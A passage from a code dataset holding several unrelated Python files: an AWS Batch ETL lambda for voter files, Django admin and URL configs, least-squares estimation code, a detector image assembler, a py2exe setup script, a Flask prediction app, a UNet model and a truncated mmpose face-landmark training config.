report_date,\n jobQueue='National-Voter-File-Job-Queue',\n jobDefinition='ETL', dependsOn=dependsOn,\n containerOverrides=xform_command)\n return job_submit_result['jobId']\n\ndef lambda_handler(event, context):\n batch_client = boto3.client('batch')\n \"\"\":type: pyboto3.batch\"\"\"\n\n s3 = boto3.resource('s3')\n\n # Extract the bucket name and object name\n bucket = event['Records'][0]['s3']['bucket']['name']\n key = urllib.parse.unquote_plus(event['Records'][0]['s3']['object']['key'])\n\n # Determine the state associated with this bucket\n bucket_tagging = s3.BucketTagging(bucket)\n state_tags = [el for el in bucket_tagging.tag_set if el['Key'] == 'state_name']\n state_name = state_tags[0]['Value']\n\n reporter = reporter_dict[state_name]\n\n # Extract the file date\n m = re.search(\"_([0-9]{4})([0-9]{2})([0-9]{2}).*\", key)\n if not m:\n raise Exception(\"Can't determine file date from \" + key)\n\n report_date = \"%s-%s-%s\" % (m.group(1), m.group(2), m.group(3))\n\n print(\"Processing file for \" + state_name + \" on \" + report_date)\n\n # Copy the file from S3 to our local EFS mount\n cp_job = submit_file_copy_job(batch_client, bucket, key)\n print(\"cp job is \" + cp_job)\n\n input_file = \"/work/\" + key\n\n # Unzip the file once it is copied (if necessary)\n (base_file, extension) = os.path.splitext(input_file)\n if extension == '.gz' or extension == '.zip':\n file_ready_job = submit_unzip_job(batch_client, input_file, extension, [{'jobId': cp_job}])\n\n if input_file.endswith('gz'):\n file_ready_job = submit_unzip_job(batch_client, input_file, [{'jobId': cp_job}])\n m = re.match(\"(.*)\\\\.gz$\", input_file)\n input_file = m.group(1)\n else:\n file_ready_job = cp_job\n\n # Schedule a transform job after that\n transform_job = submit_transform_job(batch_client, input_file, state_name, [{'jobId': file_ready_job}])\n\n # The precinct job can run in parallel\n precinct_job = submit_precinct_job(batch_client, input_file, state_name, report_date, [{'jobId': file_ready_job}])\n\n # The load job needs the transform and the precincts\n load_job = submit_load_job(batch_client, \"/work/\" + state_name.lower() + \"_output.csv\", state_name, report_date,\n reporter, [{'jobId': transform_job}, {'jobId': precinct_job}])\n","sub_path":"python/s3Job.py","file_name":"s3Job.py","file_ext":"py","file_size_in_byte":6339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"426187810","text":"from django.contrib import admin\nfrom models import *\n\nfrom perception.actions import export_as_xls\n\nadmin.site.register(Camera)\n\n\nclass MotionAdmin(admin.ModelAdmin):\n list_filter = ['camera']\n\nclass VolumeAdmin(admin.ModelAdmin):\n list_filter = ['camera']\n\nadmin.site.register(Volume, VolumeAdmin)\nadmin.site.register(Motion, MotionAdmin)\n\n\n\nclass MyAdmin(admin.ModelAdmin):\n actions = [export_as_xls]\n\nadmin.site.add_action(export_as_xls)","sub_path":"perception/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"39657568","text":"import numpy as np\nimport scipy as sp\nimport matplotlib.pyplot as plt\n\ndef extractTrainingSet(G):\n Phi = np.zeros((len(G), len(G[0][0])))\n Y = np.zeros((len(G),len(G[0][1])))\n for i in range(len(G)):\n Phi[i] = G[i][0]\n Y[i] = G[i][1]\n return Phi, Y\n\ndef bls(Phi, Y): #batchLeastSquares\n \"\"\"performs batch least squares on data set G\"\"\"\n PTP = np.dot(Phi.T,Phi)\n PTY = np.dot(Phi.T,Y)\n return np.dot(np.linalg.inv(PTP),PTY)\n\ndef wbls(Phi, Y, W): #weightedBatchLeastSquares\n \"\"\"Weighted Batch Least Squares\"\"\"\n #TODO: get dim M and throw error if W is not MxM\n PTWP = np.dot(Phi.T, np.dot(W, Phi))\n PTWY = np.dot(Phi.T, np.dot(W, Y))\n return np.dot(np.lingalg.inv(PTWP, PTWY))\n\ndef rls(Phi, Y, alpha=2000, NRLS=20):\n \"\"\"Recursive Least Squares\"\"\"\n M = Phi.shape[0]\n N = Phi.shape[1]\n \n # initialize thetahat and P\n thetahat = np.array([0.,0.]).T\n P = alpha * np.identity(N)\n for i in range(M * NRLS):\n x = Phi[i%M, :]\n y = Y[i%M]\n c = 1 + np.dot(x.T, np.dot(P, x))\n Px = np.dot(P, x)\n P = np.dot(np.identity(2) - (np.outer(Px, x.T) / c), P)\n diff = y - np.dot(x.T, thetahat)\n #FIXME: this line works only because y is a scalar\n thetahat = thetahat + np.dot(P, x) * diff\n return thetahat\n\ndef wrls(Phi, Y, alpha=2000, forget_factor=1, NRLS=20):\n \"\"\"Weighted Recursive Least Squares\"\"\"\n Phi, Y = extractTrainingSet(G)\n M = Phi.shape[0]\n N = Phi.shape[1]\n \n # initialize thetahat and P\n thetahat = np.array([0.,0.]).T\n P = alpha * np.identity(N)\n for i in range(M * NRLS):\n x = Phi[i%M, :]\n y = Y[i%M]\n c = forget_factor * 1 + np.dot(x.T, np.dot(P, x))\n Px = np.dot(P, x)\n P = np.dot(np.identity(2) - (np.outer(Px, x.T) / c), P)\n P = P / forget_factor\n diff = y - np.dot(x.T, thetahat)\n #FIXME: this line works only because y is a scalar\n thetahat = thetahat + np.dot(P, x) * diff\n return thetahat\n\ndef xsiFuzzyGauss(x, centers, spreads):\n R = centers.shape[0]\n n = centers.shape[1]\n xsi = np.zeros(x.shape)\n den = 0\n for i in range(R):\n prod = 1\n for j in range(n):\n prod *= np.exp(-0.5 * ((x[j] - centers[i][j]) / spreads[i][j]) ** 2)\n den += prod\n for i in range(R):\n num = 1\n for j in range(n):\n num *= np.exp(-0.5 * ((x[j] - centers[i][j]) / spreads[i][j]) ** 2)\n xsi[i] = num / den\n return xsi\n\ndef fuzzyGaussBLS(X, C, S, Y):\n Phi = np.zeros(X.shape)\n for i in range(X.shape[0]):\n Phi[i,:] = xsiFuzzyGauss(X[i,:], C, S)\n return bls(Phi, Y)\n \ndef calcUcrisp(x, b, C, S):\n num = 0\n den = 0\n for i in range(C.shape[0]):\n prod = 1\n for j in range(C.shape[1]):\n prod *= np.exp(-0.5 * ((x[j] - C[i][j]) / S[i][j]) ** 2)\n num += b[i] * prod\n den += prod\n return num / den\n\ndef fuzzyGaussRLS(X, C, S, Y):\n Phi = np.zeros(X.shape)\n for i in range(X.shape[0]):\n Phi[i,:] = xsiFuzzyGauss(X[i,:], C, S)\n return rls(Phi, Y)\n \n \nif __name__ == '__main__':\n G = [[[1.,1.],[1.]],[[2.,1.],[1.]],[[3.,1.],[3.]]]\n Phi, Y = extractTrainingSet(G)\n \n # Test bls and rls\n thetaHat = bls(Phi, Y)\n print(thetaHat)\n thetaHat2 = rls(Phi, Y)\n thetaHat3 = wrls(Phi, Y, alpha=100, forget_factor=0.9)\n print(thetaHat2)\n\n # Test fuzzyGaussBLS\n X = np.array([[0.,2.],[2.,4.],[3.,6.]])\n #C = X[:2, :]\n C = np.array([[1.5,3.],[3.,5.]])\n #print(C)\n S = 2 * np.ones((2,2))\n Y = [1.,5.,6.]\n theta = fuzzyGaussBLS(X, C, S, Y)\n #print(theta)\n for i in range(X.shape[0]):\n print(calcUcrisp(X[i,:], theta, C, S))\n\n X2 = np.array([[1,2],[2.5,5],[4,7]])\n for i in range(X2.shape[0]):\n print(calcUcrisp(X2[i,:], theta, C, S))\n\n # Test fuzzyGaussRLS\n theta2 = fuzzyGaussBLS(X, C, S, Y)\n print(theta2)\n for i in range(X.shape[0]):\n print(calcUcrisp(X[i,:], theta2, C, S))\n\n for i in range(X2.shape[0]):\n print(calcUcrisp(X2[i,:], theta2, C, S))\n\n\n\n\n\n\n\n","sub_path":"est-and-id/least-squares.py","file_name":"least-squares.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"401255468","text":"\n\nfrom xai.brain.wordbase.nouns._recitation import _RECITATION\n\n#calss header\nclass _RECITATIONS(_RECITATION, ):\n\tdef __init__(self,): \n\t\t_RECITATION.__init__(self)\n\t\tself.name = \"RECITATIONS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"recitation\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_recitations.py","file_name":"_recitations.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"123377226","text":"import logging\nlog = logging.getLogger(\"drc host\")\nlog.DEBUG = logging.DEBUG\nlog.INFO = logging.INFO\nlog._fmt = logging.Formatter('%(relativeCreated)09d | %(levelname)s | %(target)s | %(message)s')\nlog.HST = {\"target\": \"HST\"}\nlog.BBB = {\"target\": \"BBB\"}\nlogHandler = logging.StreamHandler()\nlogHandler.setFormatter(log._fmt)\nlog.addHandler(logHandler)\nlog.setLevel(log.DEBUG)\nlogHandler.setLevel(log.DEBUG)\n","sub_path":"host/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"17984711","text":"import numpy as np\n\nclass CsPad( object ):\n\n npix_quad = 850\n \n # origin of section in quad coordinate system\n #\n # x-position correspond to column number\n xpos_sec2x1 = [[ 414, 626, 0, 0, 213, 1, 418, 419], # 2:5 were not measured\n [ 421, 634, 0, 0, 213, 1, 424, 425],\n [ 417, 630, 0, 1, 212, 0, 425, 426],\n [ 416, 630, 0, 0, 213, 1, 420, 421]] # 2:5 were not measured\n # y-position correspond to maxrows - row number \n ypos_sec2x1 = [[ 0, 0, 214, 1, 425, 425, 615, 402], # 2:5 were not measured\n [ 0, 0, 214, 1, 425, 425, 615, 402],\n [ 0, 0, 215, 3, 431, 431, 616, 403],\n [ 0, 0, 214, 1, 425, 425, 615, 403]] # 2:5 were not measured\n \n\n def __init__(self, config):\n quads = range(4)\n self.sections = map(config.sections, quads)\n pass\n\n def CsPadElement( self, data3d, qn ):\n # Construct one image for each quadrant, each with 8 sections\n # from a data3d = 3 x 2*194 x 185 data array\n # +---+---+-------+\n # | | | 6 |\n # + 5 | 4 +-------+\n # | | | 7 |\n # +---+---+---+---+\n # | 2 | | |\n # +-------+ 0 | 1 |\n # | 3 | | |\n # +-------+---+---+\n\n # min and max\n #print \"CsPad (min,max) for quad %d: (%d,%d)\" % (qn,np.min(data3d),np.max(data3d))\n\n\n # if any sections are missing, insert zeros\n if len( data3d ) < 8 :\n zsec = np.zeros( (185,388), dtype=data3d.dtype)\n #zsec = zsec * -99\n for i in range (8) :\n if i not in self.sections[qn] :\n data3d = np.insert( data3d, i, zsec, axis=0 )\n\n pairs = []\n for i in range (8) :\n \n # insert gap between asics in the 2x1\n asics = np.hsplit( data3d[i], 2)\n gap = np.zeros( (185,4), dtype=data3d.dtype )\n #gap = gap * -99\n pair = np.hstack( (asics[0], gap, asics[1]) )\n\n \n # sections 2,3 and 6,7 are as is. The others need some rotation:\n if i==0 or i==1 :\n pair = pair[:,::-1].T\n if i==4 or i==5 :\n pair = pair[::-1,:].T\n\n pairs.append( pair )\n\n\n # make the array for this quadrant\n quadrant = np.zeros( (self.npix_quad, self.npix_quad), dtype=data3d.dtype )\n #quadrant = quadrant * -99\n\n # insert the 2x1 sections according to\n for sec in range (8):\n nrows, ncols = pairs[sec].shape\n\n # x,y in quadrant coordinate system\n xpos = self.xpos_sec2x1[qn][sec]\n ypos = self.ypos_sec2x1[qn][sec]\n colp = xpos\n rowp = self.npix_quad-ypos\n\n quadrant[rowp-nrows:rowp, colp:colp+ncols] = pairs[sec][0:nrows,0:ncols]\n\n\n # Finally, rotate the quadrant as needed\n if qn>0 : quadrant = np.rot90( quadrant, 4-qn)\n return quadrant\n\n\n\n def CsPadElementUnaligned( self, data3d, qn ):\n # Construct one image for each quadrant, each with 8 sections\n # from a data3d = 3 x 2*194 x 185 data array\n # +---+---+-------+\n # | | | 6 |\n # + 5 | 4 +-------+\n # | | | 7 |\n # +---+---+---+---+\n # | 2 | | |\n # +-------+ 0 | 1 |\n # | 3 | | |\n # +-------+---+---+\n\n zeros = np.zeros((18,388),dtype=data3d.dtype)\n zeros9 = np.zeros((9,388),dtype=data3d.dtype)\n zeros6 = np.zeros((6,388),dtype=data3d.dtype)\n\n # if any sections are missing, insert zeros\n if len( data3d ) < 8 :\n zsec = np.zeros( (185,388), dtype=data3d.dtype)\n for i in range (8) :\n if i not in self.sections[qn] :\n data3d = np.insert( data3d, i, zsec, axis=0 )\n #print \"section \", i\n #print data3d[i]\n\n\n s01 = np.concatenate( (zeros6.T,\n data3d[0][:,::-1].T,\n zeros6.T,\n data3d[1][:,::-1].T,\n zeros6.T),\n 1)\n s23 = np.concatenate( (zeros6,\n data3d[2], \n zeros6,\n data3d[3],\n zeros6 ),\n 0 )\n s45 = np.concatenate( (zeros6.T,\n data3d[5][::-1,:].T,\n zeros6.T,\n data3d[4][::-1,:].T,\n zeros6.T), \n 1 )\n s67 = np.concatenate( (zeros6,\n data3d[6], \n zeros6,\n data3d[7],\n zeros6 ),\n 0 )\n\n m1 = np.hstack( (s23, s01) )\n m2 = np.hstack( (s45, s67) )\n e0 = np.vstack( (m2, m1) )\n\n if qn>0 : e0 = np.rot90( e0, 4-qn)\n return e0\n\n","sub_path":"XtcExplorer/tags/V00-00-14/src/cspad.py","file_name":"cspad.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"574278780","text":"__author__ = \"Rustam Safin\"\nimport os\nimport sys\n\nfrom distutils.core import setup\nfrom distutils.dir_util import copy_tree\nfrom py2exe.build_exe import py2exe\nimport glob\nimport zlib\nimport shutil\nimport time\nimport pyface\nimport enable\nimport test\n\ndistDir = \"build\"\n\n# Remove the build folder\nshutil.rmtree(\"build\", ignore_errors=True)\n\n\nclass Target(object):\n \"\"\" A simple class that holds information on our executable file. \"\"\"\n def __init__(self, **kw):\n \"\"\" Default class constructor. Update as you need. \"\"\"\n self.__dict__.update(kw)\n\ndef copyPackage (pkg, name, dist) :\n p = os.path.join (dist, name)\n copy_tree (pkg.__path__[0], p)\n\ncopyPackage (enable, \"enable\", distDir)\ncopyPackage (pyface, \"pyface\", distDir)\nincludes = ['sip', 'PyQt4.Qt', 'uuid', 'test']\nexcludes = ['_gtkagg', '_tkagg', 'bsddb', 'curses', 'email', 'pywin.debugger',\n 'pywin.debugger.dbgcon', 'pywin.dialogs', 'tcl',\n 'Tkconstants', 'Tkinter', 'tvtk', 'mayavi']\npackages = ['pyface', 'enable', 'chaco']\ndll_excludes = ['libgdk-win32-2.0-0.dll', 'libgobject-2.0-0.dll', 'tcl84.dll',\n 'tk84.dll']\ndata_files = []\nicon_resources = []\nbitmap_resources = []\nother_resources = []\n\n\nGUI2Exe_Target_1 = Target(\n # what to build\n script=\"main.py\",\n icon_resources=icon_resources,\n bitmap_resources=bitmap_resources,\n other_resources=other_resources,\n dest_base=\"main\",\n version=\"0.1\",\n company_name=\"MiT-Ufa\",\n copyright=\"Rustam Safin\",\n name=\"OmniBackupGantt\")\n\nsetup(\n data_files=data_files,\n options={\"py2exe\": {\"compressed\": 0,\n \"optimize\": 0,\n \"includes\": includes,\n \"excludes\": excludes,\n \"packages\": packages,\n \"dll_excludes\": dll_excludes,\n \"bundle_files\": 3,\n \"dist_dir\": distDir,\n \"xref\": False,\n \"skip_archive\": True,\n \"ascii\": False,\n \"custom_boot_script\": ''}},\n\n zipfile=r'library.zip',\n console=[],\n windows=[GUI2Exe_Target_1],\n service=[],\n com_server=[],\n ctypes_com_server=[])\n","sub_path":"src/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"280219867","text":"from PIL import Image\r\nimport socket\r\nimport os\r\nfrom flask import Flask, render_template, request, session, flash\r\nfrom pre import pre_process_me\r\nfrom datetime import timedelta\r\nfrom model_predict import predict_me\r\napp = Flask(__name__)\r\napp.secret_key = b'some_secret'\r\nUPLOAD_FOLDER = os.path.basename('uploads')\r\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\r\nMASK_FOLDER = os.path.basename('masks')\r\napp.config['MASK_FOLDER'] = MASK_FOLDER\r\n\r\n# TODO:\r\n# MASK UPLOAD IN WEBSITE, PREDICT BUTTON\r\n# MODEL model-tgs-salt-2.h5\r\n\r\n\r\n@app.before_request\r\ndef make_session_active():\r\n session.modified = True\r\n\r\n\r\n@app.before_request\r\ndef make_session_permanent():\r\n session.permanent = True\r\n app.permanent_session_lifetime = timedelta(minutes=300)\r\n\r\n\r\n@app.route('/')\r\ndef hello_world():\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/')\r\ndef default_access():\r\n return render_template(\"index.html\")\r\n\r\n\r\n@app.route('/', methods=['POST'])\r\ndef home_page():\r\n if request.method == 'POST':\r\n if request.args.get('type') == \"upload_me\":\r\n if get_image() and get_thres():\r\n flash(\"Upload Success\")\r\n else:\r\n flash(\"Upload Failed\")\r\n\r\n return render_template(\"index.html\")\r\n\r\n\r\n@app.route('/predict', methods=['GET', 'POST'])\r\ndef predicts_me():\r\n if 'thres' in session and 'image_file_name' in session:\r\n X, X_feat = pre_process_me(session['image_file_name'])\r\n #call in model and predict\r\n salt_prop, mask_graph, scats = predict_me(X, X_feat, \"0cc1d0e4c4.png\", session['thres'])\r\n flash('Plot Me')\r\n print(salt_prop, mask_graph)\r\n return render_template(\"index.html\", salt_prop=salt_prop, mask_graph=mask_graph, plots=scats)\r\n else:\r\n flash(\"Please Upload Seismic Image and Threshold Value\")\r\n return render_template(\"index.html\")\r\n return render_template(\"index.html\")\r\n\r\n\r\ndef get_thres():\r\n try:\r\n thres = request.form['Thres']\r\n session['thres'] = int(thres)\r\n print(session)\r\n return True\r\n except Exception as e:\r\n return False\r\n\r\n\r\ndef get_image():\r\n file = request.files['Simage']\r\n f = os.path.join(app.config['UPLOAD_FOLDER'], file.filename)\r\n file.save(f)\r\n flag = False\r\n try:\r\n im = Image.open(f)\r\n flag = True\r\n session['image_file_name'] = file.filename.split(\".\")[0] + \".PNG\"\r\n except IOError as e:\r\n os.remove(f)\r\n im.thumbnail((101, 101))\r\n im.save(os.path.join(app.config['UPLOAD_FOLDER'], file.filename.split(\".\")[0] + \".PNG\"))\r\n del im\r\n return flag\r\n\r\n\r\ndef get_mask():\r\n file = request.files['mask']\r\n f = os.path.join(app.config['MASK_FOLDER'], file.filename)\r\n file.save(f)\r\n flag = False\r\n try:\r\n im = Image.open(f)\r\n flag = True\r\n session['mask_file_name'] = file.filename.split(\".\")[0] + \".PNG\"\r\n except IOError as e:\r\n os.remove(f)\r\n im.thumbnail((101, 101))\r\n im.save(os.path.join(app.config['MASK_FOLDER'], file.filename.split(\".\")[0] + \".PNG\"))\r\n del im\r\n return flag\r\n\r\n\r\n","sub_path":"Code/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"637650622","text":"from django.urls import path\nfrom django.views.generic import TemplateView\nfrom .views import index, feedbackView,user_login, signup, user_logout, login_success, profile_view\nfrom . import views\n\napp_name = 'portfolio'\nurlpatterns = [\n path('', index.as_view(), name='index'),\n path('feedback/', feedbackView.as_view(), name='feedback'),\n path('feedback/index/', index.as_view(), name='index'),\n path('signup/', signup, name='signup'),\n path('signup/account/', login_success , name='signup_success'),\n path('login/', user_login, name='login'),\n path('login/account/', login_success , name='login_success'),\n path('account/', profile_view.as_view() , name='account'),\n #path('login/account/', profile_view.as_view() , name='account'),\n #path('login/account/', login_success , name='login_success'),\n #path('account/', user_logout, name='logout'),\n #path('account/login', user_login, name='login'),\n]","sub_path":"portfolio/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"538999156","text":"import torch\r\nimport torch.nn as nn\r\n\r\n\r\ndef EncoderBlock(i, o, kernel_size=(3, 3), stride=1, padding=1, bn=True):\r\n layers = [nn.Conv2d(i, o, kernel_size=kernel_size, stride=stride, padding=padding, bias=not bn)]\r\n if bn:\r\n layers += [nn.BatchNorm2d(o)]\r\n layers += [nn.ReLU(inplace=True)]\r\n\r\n layers += [nn.Conv2d(o, o, kernel_size=kernel_size,\r\n stride=stride, padding=padding, bias=not bn)]\r\n if bn:\r\n layers += [nn.BatchNorm2d(o)]\r\n layers += [nn.ReLU(inplace=True)]\r\n\r\n return nn.Sequential(*layers)\r\n\r\n\r\ndef DecoderBlock(i, o, kernel_size=(3, 3), stride=1, padding=1, bn=True):\r\n layers = [nn.Conv2d(i, o*2, kernel_size=kernel_size,\r\n stride=stride, padding=padding, bias=not bn)]\r\n if bn:\r\n layers += [nn.BatchNorm2d(o*2)]\r\n layers += [nn.ReLU(inplace=True)]\r\n\r\n layers += [nn.Conv2d(o*2, o*2, kernel_size=kernel_size,\r\n stride=stride, padding=padding, bias=not bn)]\r\n if bn:\r\n layers += [nn.BatchNorm2d(o*2)]\r\n layers += [nn.ReLU(inplace=True)]\r\n\r\n layers += [nn.ConvTranspose2d(o*2, o, kernel_size=2, stride=2)]\r\n return nn.Sequential(*layers)\r\n\r\n\r\nclass UNet(nn.Module):\r\n def __init__(self):\r\n super(UNet, self).__init__()\r\n self.enc_1 = EncoderBlock(3, 64)\r\n self.pool_1 = nn.MaxPool2d(2)\r\n self.enc_2 = EncoderBlock(64, 128)\r\n self.pool_2 = nn.MaxPool2d(2)\r\n self.enc_3 = EncoderBlock(128, 256)\r\n self.pool_3 = nn.MaxPool2d(2)\r\n self.enc_4 = EncoderBlock(256, 512)\r\n self.pool_4 = nn.MaxPool2d(2)\r\n\r\n self.dec_4 = DecoderBlock(512, 512)\r\n self.dec_3 = DecoderBlock(1024, 256)\r\n self.dec_2 = DecoderBlock(512, 128)\r\n self.dec_1 = DecoderBlock(256, 64)\r\n self.final = nn.Sequential(\r\n nn.Conv2d(128, 64, kernel_size=(3, 3), padding=1, bias=False),\r\n nn.BatchNorm2d(64),\r\n nn.ReLU(inplace=True),\r\n nn.Conv2d(64, 64, kernel_size=(3, 3), padding=1, bias=False),\r\n nn.BatchNorm2d(64),\r\n nn.ReLU(inplace=True),\r\n nn.Conv2d(64, 2, kernel_size=(1, 1)),\r\n )\r\n\r\n def forward(self, x):\r\n enc1 = self.enc_1(x)\r\n enc2 = self.enc_2(self.pool_1(enc1))\r\n enc3 = self.enc_3(self.pool_2(enc2))\r\n enc4 = self.enc_4(self.pool_3(enc3))\r\n dec4 = self.dec_4(self.pool_4(enc4))\r\n dec3 = self.dec_3(torch.cat((dec4, enc4), dim=1))\r\n dec2 = self.dec_2(torch.cat((dec3, enc3), dim=1))\r\n dec1 = self.dec_1(torch.cat((dec2, enc2), dim=1))\r\n out = self.final(torch.cat((dec1, enc1), dim=1))\r\n return out\r\n","sub_path":"models/unet.py","file_name":"unet.py","file_ext":"py","file_size_in_byte":2690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"636421598","text":"_base_ = ['../../../_base_/default_runtime.py']\n\n# lapa coco wflw 300w cofw halpe\n\n# runtime\nmax_epochs = 120\nstage2_num_epochs = 10\nbase_lr = 4e-3\n\ntrain_cfg = dict(max_epochs=max_epochs, val_interval=1)\nrandomness = dict(seed=21)\n\n# optimizer\noptim_wrapper = dict(\n type='OptimWrapper',\n optimizer=dict(type='AdamW', lr=base_lr, weight_decay=0.05),\n clip_grad=dict(max_norm=35, norm_type=2),\n paramwise_cfg=dict(\n norm_decay_mult=0, bias_decay_mult=0, bypass_duplicate=True))\n\n# learning rate\nparam_scheduler = [\n dict(\n type='LinearLR',\n start_factor=1.0e-5,\n by_epoch=False,\n begin=0,\n end=1000),\n dict(\n type='CosineAnnealingLR',\n eta_min=base_lr * 0.005,\n begin=30,\n end=max_epochs,\n T_max=max_epochs - 30,\n by_epoch=True,\n convert_to_iter_based=True),\n]\n\n# automatically scaling LR based on the actual training batch size\nauto_scale_lr = dict(base_batch_size=512)\n\n# codec settings\ncodec = dict(\n type='SimCCLabel',\n input_size=(256, 256),\n sigma=(5.66, 5.66),\n simcc_split_ratio=2.0,\n normalize=False,\n use_dark=False)\n\n# model settings\nmodel = dict(\n type='TopdownPoseEstimator',\n data_preprocessor=dict(\n type='PoseDataPreprocessor',\n mean=[123.675, 116.28, 103.53],\n std=[58.395, 57.12, 57.375],\n bgr_to_rgb=True),\n backbone=dict(\n _scope_='mmdet',\n type='CSPNeXt',\n arch='P5',\n expand_ratio=0.5,\n deepen_factor=0.67,\n widen_factor=0.75,\n out_indices=(4, ),\n channel_attention=True,\n norm_cfg=dict(type='SyncBN'),\n act_cfg=dict(type='SiLU'),\n init_cfg=dict(\n type='Pretrained',\n prefix='backbone.',\n checkpoint='https://download.openmmlab.com/mmdetection/v3.0/'\n 'rtmdet/cspnext_rsb_pretrain/cspnext-m_8xb256-rsb-a1-600e_in1k-ecb3bbd9.pth' # noqa\n )),\n head=dict(\n type='RTMCCHead',\n in_channels=768,\n out_channels=106,\n input_size=codec['input_size'],\n in_featuremap_size=tuple([s // 32 for s in codec['input_size']]),\n simcc_split_ratio=codec['simcc_split_ratio'],\n final_layer_kernel_size=7,\n gau_cfg=dict(\n hidden_dims=256,\n s=128,\n expansion_factor=2,\n dropout_rate=0.,\n drop_path=0.,\n act_fn='SiLU',\n use_rel_bias=False,\n pos_enc=False),\n loss=dict(\n type='KLDiscretLoss',\n use_target_weight=True,\n beta=10.,\n label_softmax=True),\n decoder=codec),\n test_cfg=dict(flip_test=True, ))\n\n# base dataset settings\ndataset_type = 'LapaDataset'\ndata_mode = 'topdown'\ndata_root = 'data/'\n\nbackend_args = dict(backend='local')\n\n# pipelines\ntrain_pipeline = [\n dict(type='LoadImage', backend_args=backend_args),\n dict(type='GetBBoxCenterScale'),\n dict(type='RandomFlip', direction='horizontal'),\n dict(type='RandomHalfBody'),\n dict(\n type='RandomBBoxTransform', scale_factor=[0.5, 1.5], rotate_factor=80),\n dict(type='TopdownAffine', input_size=codec['input_size']),\n dict(type='mmdet.YOLOXHSVRandomAug'),\n dict(\n type='Albumentation',\n transforms=[\n dict(type='Blur', p=0.2),\n dict(type='MedianBlur', p=0.2),\n dict(\n type='CoarseDropout',\n max_holes=1,\n max_height=0.4,\n max_width=0.4,\n min_holes=1,\n min_height=0.2,\n min_width=0.2,\n p=1.0),\n ]),\n dict(\n type='GenerateTarget',\n encoder=codec,\n use_dataset_keypoint_weights=True),\n dict(type='PackPoseInputs')\n]\nval_pipeline = [\n dict(type='LoadImage', backend_args=backend_args),\n dict(type='GetBBoxCenterScale'),\n dict(type='TopdownAffine', input_size=codec['input_size']),\n dict(type='PackPoseInputs')\n]\n\ntrain_pipeline_stage2 = [\n dict(type='LoadImage', backend_args=backend_args),\n dict(type='GetBBoxCenterScale'),\n dict(type='RandomFlip', direction='horizontal'),\n dict(type='RandomHalfBody'),\n dict(\n type='RandomBBoxTransform',\n shift_factor=0.,\n scale_factor=[0.5, 1.5],\n rotate_factor=80),\n dict(type='TopdownAffine', input_size=codec['input_size']),\n dict(type='mmdet.YOLOXHSVRandomAug'),\n dict(\n type='Albumentation',\n transforms=[\n dict(type='Blur', p=0.1),\n dict(type='MedianBlur', p=0.1),\n dict(\n type='CoarseDropout',\n max_holes=1,\n max_height=0.4,\n max_width=0.4,\n min_holes=1,\n min_height=0.2,\n min_width=0.2,\n p=0.5),\n ]),\n dict(\n type='GenerateTarget',\n encoder=codec,\n use_dataset_keypoint_weights=True),\n dict(type='PackPoseInputs')\n]\n\n# train dataset\ndataset_lapa = dict(\n type=dataset_type,\n data_root=data_root,\n data_mode=data_mode,\n ann_file='LaPa/annotations/lapa_trainval.json',\n data_prefix=dict(img='pose/LaPa/'),\n pipeline=[],\n)\n\nkpt_68_to_106 = [\n #\n (0, 0),\n (1, 2),\n (2, 4),\n (3, 6),\n (4, 8),\n (5, 10),\n (6, 12),\n (7, 14),\n (8, 16),\n (9, 18),\n (10, 20),\n (11, 22),\n (12, 24),\n (13, 26),\n (14, 28),\n (15, 30),\n (16, 32),\n #\n (17, 33),\n (18, 34),\n (19, 35),\n (20, 36),\n (21, 37),\n #\n (22, 42),\n (23, 43),\n (24, 44),\n (25, 45),\n (26, 46),\n #\n (27, 51),\n (28, 52),\n (29, 53),\n (30, 54),\n #\n (31, 58),\n (32, 59),\n (33, 60),\n (34, 61),\n (35, 62),\n #\n (36, 66),\n (39, 70),\n #\n ((37, 38), 68),\n ((40, 41), 72),\n #\n (42, 75),\n (45, 79),\n #\n ((43, 44), 77),\n ((46, 47), 81),\n #\n (48, 84),\n (49, 85),\n (50, 86),\n (51, 87),\n (52, 88),\n (53, 89),\n (54, 90),\n (55, 91),\n (56, 92),\n (57, 93),\n (58, 94),\n (59, 95),\n (60, 96),\n (61, 97),\n (62, 98),\n (63, 99),\n (64, 100),\n (65, 101),\n (66, 102),\n (67, 103)\n]\n\nmapping_halpe = [\n #\n (26, 0),\n (27, 2),\n (28, 4),\n (29, 6),\n (30, 8),\n (31, 10),\n (32, 12),\n (33, 14),\n (34, 16),\n (35, 18),\n (36, 20),\n (37, 22),\n (38, 24),\n (39, 26),\n (40, 28),\n (41, 30),\n (42, 32),\n #\n (43, 33),\n (44, 34),\n (45, 35),\n (46, 36),\n (47, 37),\n #\n (48, 42),\n (49, 43),\n (50, 44),\n (51, 45),\n (52, 46),\n #\n (53, 51),\n (54, 52),\n (55, 53),\n (56, 54),\n #\n (57, 58),\n (58, 59),\n (59, 60),\n (60, 61),\n (61, 62),\n #\n (62, 66),\n (65, 70),\n #\n ((63, 64), 68),\n ((66, 67), 72),\n #\n (68, 